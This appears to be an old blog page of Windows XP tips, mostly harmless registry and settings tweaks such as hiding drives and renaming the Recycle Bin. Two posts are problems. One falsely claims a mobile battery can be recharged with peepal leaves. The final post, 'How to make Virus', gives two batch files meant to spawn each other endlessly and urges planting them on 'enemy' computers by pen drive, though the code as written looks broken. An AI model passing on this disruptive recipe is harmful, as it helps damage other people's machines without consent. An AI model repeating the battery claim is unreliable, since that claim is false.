Showing posts with label Computer Fun Tips. Show all posts
Showing posts with label Computer Fun Tips. Show all posts

Thursday, November 12, 2009

How to rename your Recycle Bin

1. Click Start / Run
2. Type regedit and press enter.
3. Open the HKEY_CLASSES_ROOT folder
4. Open the CLSID folder
5. Open the {645FF040-5081-101B-9F08-00AA002F954E} folder
6. Open the ShellFolder folder
7. Change the "Attributes" data value from "40 01 00 20" to "50 01 00 20". Once completed change the "CallForAttributes" dword value to "0x00000000" (double-click and change value data to 0). You must change both of these values to get the rename to appear.
[/hide_me]
After performing the above steps you will be able to rename the icon like any other icon. Right-click the Recycle Bin icon on the desktop and click Rename and rename it to whatever you wish.

Thursday, September 10, 2009

How to Recharge Mobile Without Electricity

1- Open your mobile cover
2- Take out your battery
3- Take two to three fresh leaves of peepal/pipal/ashwattha tree
4- Touch the stub of these leaves on your mobile battery terminal for a minute
5- Clean the mobile battery terminal with the soft cloth
6- Put your battery again in your mobile and switch it on
7- Now you can see the result
8- If required repeat the process with fresh leaves

Sunday, August 16, 2009

How to Format USB Drive with NTFS

In Windows XP and Windows Vista you can set to format an USB drive with NTFS. By default, formatting USB drives is set only to FAT and FAT32. In order to enable the USB drive formatting with NTFS, please follow the next steps:

* Connect your USB device to your computer;
* Right-click on My Computer from the desktop;
* Choose Manage;
* Next click on Device Manager and then expand Disk Drives;
* Go to the USB drive list and choose your device;
* Right-click on the USB drive under Disk Drives and choose Properties;
* Then go to the Policies tab;
* The default policy is set to Optimize for quick removal. Change it by selecting the Optimize for performance.

Now open Windows Explorer and right click on your USB drive and select Format. You will have a new option for File System (NTFS)

Friday, July 31, 2009

Make XP boot even Faster


Microsoft has chosen a completely different path for XP and it's boot features by trying to incorporate as much support for newer fastboot BIOSes that are on most current motherboards. They built XP in such a way as to make it able to take advantage of features in these new BIOSes, and one of the coolest things is a small application called bootvis. bootvis. Bootvis watches everything that loads at boot time, from the moment the OS begins to load just after POST (Power On Self-Test) to the moment you get to a usable Desktop. Some programs, most notably Norton AntiVirus 2002, suck up valuable seconds before you can actually DO anything even though you're at the Desktop. bootvis generates a trace file that you load and can then "see" a visual representation of what's happening. Every file, driver, hard drive read/write, etc., is recorded. You can then use bootvis to optimize the loading of files during the boot sequence. bootvis will rearrange the ways these very files are stored on the hard drive, thereby improving the boot time dramatically.

Hide Drive in My Computer


This setting allows you to control which drives are visible in My Computer and Explorer. It is possible to hide all drives or just selected ones.

Open your registry (press win+r and type regedit , hit enter ) goto

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer]

and find or create the DWORD “NoDrives” there by right clicking on explorer -> NEW -> DWORD value .

The “NoDrives” value uses a 32-bit word to define local and network drive visibility for each logical drive in the computer. The lower 26 bits of the 32-bit word correspond to drive letters A through Z. Drives are visible when set to 0 and hidden when set to 1.

If your not happy working in Hex, add these decimal numbers to hide the drive(s):

A: 1, B: 2, C: 4, D: 8, E: 16, F: 32, G: 64, H: 128, I: 256, J: 512, K: 1024, L: 2048, M: 4096, N: 8192, O: 16384, P: 32768, Q: 65536, R: 131072, S: 262144, T: 524288, U: 1048576, V: 2097152, W: 4194304, X: 8388608, Y: 16777216, Z: 33554432, ALL: 67108863

For example to hide drive A and drive D, you would add 1 (A) + 8 (D) which means the value should be set to “9″.

To disable all the drives set the value to “67108863″.

Restart Windows for the change to take effect.

Note: These drives will still appear in File Manager, to remove File Manager, delete or rename winfile.exe.

Registry Settings
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer]

System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer]

Value Name: NoDrives

Data Type: REG_DWORD (DWORD Value

Slow Shutdown


Some people have noticed that they are experiencing a really slow shutdown after installing Windows XP Home or Professional. Although this can be caused a number of ways, the most clear cut one so far is happening on systems with an NVidia card installed with the latest set of drivers. A service called NVIDIA Driver Helper Service is loading up on start up and for whatever reason doesn't shut itself down properly. The service isn't needed and can also increase the amount of memory available to your system. Here is how to disable it.
1: Go into your Control Panel
2: Select Administrative Tools and then click on Services
3: Right click on the file "NVIDIA Driver Helper Service" and then select STOP.
4: To stop this loading up every time you boot up your PC Right click it again and select properties - then where the option "Startup Type" is shown - make sure it is set at Manual like we have shown in the image below.

Locking Drives in My Computer

We don’t usually prefer to lock our drives, but sometimes it becomes nesscary.

Say for instance you might have stored your office documents in D:\ and you don’t want your kids to access it, in such case this technique can be useful for you.

Please don’t try this tweak with your root drive (usually C:\ is the root drive) since root drives are not intended to be locked because they are mandatory for the system and application programs. Start & Run and type Regedit to open Registry editor Browse HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer Create a new DWORD value NoViewOnDrive and set its value as 2^ (Alpha Number of Drive Letter-1) where Alpha number are simple counting of alphabets from A to Z as 1 - 26

For example: to lock C:\, Alpha number of C is 3 so 2^ (3-1) = 4 (decimal value) To lock more drives, calculate the value of each drive and then set sum of those numbers as value To unlock your drive just delete the key from the registry.

Friday, March 6, 2009

Speed up the Start menu in XP

When using the Start menu you might notice a delay between clicking a sub-menu and watching it open ? this is added deliberately by Windows. It?s possible to remove it, as long as you are a confident computer user happy to edit the Windows Registry.



  • click Start, then Run, type regedit and press Enter.
  • Click the plus sign next to HKEY_CURRENT_USER, then click the plus sign next to Control Panel and select Desktop.
  • Look for an entry in the right pane called MenuShowDelay. This has a default value of 400.
  • Right-click it and select Modify ? entering a value of between 50 and 100 will speed up the Start menu.
Now You can find out that start menu is speed up by following these steps. Now you can enjoy by speed of your system.......... If you have any doubts on this post leave a comment..................................

Monday, March 2, 2009

Boost up ur Ram Size to Play Higher Ram Games

To boost performance of your PC or to increase RAM virtually,
Right click on My Computer Icon on Desktop

>> Go to Properties
>> Go to Advanced
>> Go to Performance - Settings
>> Go to Advanced
>> Go to Virtual Memory - Change

Keep the initial size same as recommended and maximum size double of it then restart your system.
It will improve speed of windows and you can play some games which require higher RAM.

Friday, January 30, 2009

How to make Virus


First Right click on Desktop

Then Select New <--> Text Document

Right click on it and Select Edit an Enter the matter as

:ONE
:start BOB
:GOTO ONE

Save it as JOE.BAT

Then again Select New <--> Text Document

Right click on it and Select Edit and Enter the matter as

:ONE
;START JOE.Bat
:GOTO ONE

Save it as BOB.BAT

Then Copy The Files and Send it by PEN DRIVES to yours ENEMY COMPUTERS

Related Posts Plugin for WordPress, Blogger...

 
Design by Wordpress Theme | Bloggerized by Free Blogger Templates | coupon codes